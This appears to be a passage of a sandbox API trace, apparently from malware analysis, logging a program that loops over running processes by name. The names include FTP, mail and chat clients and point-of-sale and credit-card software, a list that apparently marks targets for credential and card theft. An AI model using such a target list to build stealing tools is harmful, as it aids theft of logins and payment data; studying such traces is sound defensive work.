dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0246.003] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0246.004] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0246.006] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0246.007] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0246.008] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0246.009] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0246.011] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0246.015] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0246.016] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0246.018] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0246.019] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0246.020] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0246.022] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0246.023] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0246.024] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0246.025] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0246.077] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0246.078] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0246.080] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0246.082] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0246.083] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0246.085] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0246.087] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0246.088] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0246.093] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0246.094] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0246.096] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0246.097] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0246.099] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0246.100] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0246.102] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0246.104] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0246.108] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0246.110] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0246.111] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0246.113] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0246.114] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0246.116] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0246.117] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0246.119] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0246.158] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0246.159] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0246.161] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0246.163] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0246.165] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0246.172] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0246.174] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0246.176] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0246.178] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0246.180] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0246.183] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0246.188] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0246.190] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0246.192] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0246.194] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0246.196] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0246.218] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0246.220] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0246.222] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0246.224] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0246.226] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0246.227] CloseHandle (hObject=0x1b08) returned 1 [0246.228] Sleep (dwMilliseconds=0x64) [0246.375] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0246.394] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.396] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0246.398] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0246.400] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.405] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0246.407] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.409] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0246.411] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0246.413] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0246.414] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.416] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.501] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0246.504] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.506] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.508] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.510] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.517] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.520] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.521] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.523] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0246.524] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0246.526] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0246.530] Process32Next (in: 